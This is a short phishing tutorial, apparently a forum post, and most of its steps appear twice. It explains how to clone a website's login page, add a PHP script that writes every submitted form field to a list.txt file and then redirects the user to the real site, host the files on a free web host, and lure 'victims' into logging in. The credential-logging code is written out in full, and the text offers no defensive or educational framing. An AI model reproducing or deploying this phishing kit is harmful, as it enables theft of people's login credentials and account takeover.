go to a website on mozilla firefox (recomended for phishing)
Save the whole page by going to File->Save Page As..
You will now have an HTML file and a folder full of images and maybe some Javascript files. Rename the HTML file to index.html and create another file called list.txt. This text file will hold the login credentials of the victims.
then open Notepad and paste the following code then press on file > save as > then the name should be phish.php and the type as all files...
now place the three files on a web hosting site like :
www.webs.com
now make your victim log in
then check the list.txt

Save the whole page by going to File->Save Page As..
You will now have an HTML file and a folder full of images and maybe some Javascript files. Rename the HTML file to index.html and create another file called list.txt. This text file will hold the login credentials of the victims.
then open Notepad and paste the following code then press on file > save as > then the name should be phish.php and the type as all files...
Code:
<?phpHeader("Location: [url="http://www.realsite.com/"]http://www.RealSite.com[/url]");
$handle = fopen("list.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);fwrite($handle, "=");fwrite($handle, $value);fwrite($handle, "\r\n");}fwrite($handle, "\r\n");
fclose($handle);exit;?>
now place the three files on a web hosting site like :
www.webs.com
now make your victim log in
then check the list.txt
